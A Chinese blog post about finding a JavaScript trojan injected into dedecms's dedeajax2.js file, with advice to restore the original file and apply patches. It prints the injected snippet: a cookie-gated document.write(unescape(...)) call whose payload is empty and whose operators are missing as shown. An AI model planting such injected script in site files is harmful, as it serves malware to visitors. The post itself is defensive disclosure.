dedecms:dedeajax2.js被植入js木马
所属分类:
CMS教程 / dedecms
阅读数:
1543
收藏 0赞 0分享
这阵子我的一个网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做准备工作,呵呵。结果发现,dedeajax2.js被植入了木马。源码如下:
//初始化xmldom
function InitXDom(){
if(DedeXDOM!=null) return;
var obj = null;
if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、Firefox
var parser = new DOMParser();
obj = parser.parseFromString(xmlText, "text/xml");
} else { // IE
try { obj = new ActiveXObject("MSXML2.DOMDocument");} catch (e) { }
if (obj == null) try { obj = new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { }
}
DedeXDOM = obj;
};
//以下是被植入木马的部分,乱码都是经由unicode码处理。现在的马夫越来越狡猾了
if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);document.cookie='hello=Yes;path=/;expires=' expires.toGMTString();document.write(unescape(""));}
用原版本的dedeajax2覆盖,即可。这个文件,dede的模板都要用到,搜索了,没有发现说明用处。
不过建议大家,多注意dedecms的官方补丁,unix服务器的站长,千万别所有文件都是设置,虽然dede在unix的服务器上,设置太过繁琐。
关键字描述:木马 obj " if new // null var dede 植入
DEDECMS 留言薄模块的使用方法
DEDECMS默认没有启用留言板的功能,所以要我们自己添加。不论是普通的企业站还是门户型的CMS,只要是需求明显的网站都应该要有留言板的互动模块
收藏 0赞 0分享
dedecms5.7 文章不能发布问题探讨及解决方法
dedecms的前台会员发布文章的功能,用ckeditor就有点问题了,会员上传图片,用ckeditor的话,非管理员账号点击上传图片按钮时会弹出:提示:需输入后台管理目录才能登录,真的是很郁闷啊,遇到此问题的朋友可以看看哦
收藏 0赞 0分享
解决织梦DEDE5.7 tags系列bug(图解步骤)
网上搜索了一下,很多都没什么太大的作用,最多只是给个简单的思想,而没自己实际解决掉织梦5.7 tags标签显示未审核的BUG,想修复这个bug就是找不到相关的文章,很是郁闷,感兴趣的朋友可以了解下本文或许对你有所帮助
收藏 0赞 0分享
dedecms图片相关问题—后台上传图片实现图片轮播
用dedecms套网站已经有很长时间了,但图片轮播都是手工修改代码.今天抽时间研究了一下在后台上传图片来实现图片轮播,这样可以提高工作效率解放了手工,感兴趣的朋友可以参考下本文,或许有意外的收获啊
收藏 0赞 0分享
织梦(dede)模板标签书写格式的规范和相关注意事项
一、织梦模板标签的书写格式以及注意事项:
1. 书写格式:
① {dede:标签名 参数='值' 参数='值'} 底层模板 {/dede:标签名}
② {dede:标签名 参数='值'/}
收藏 0赞 0分享
查看更多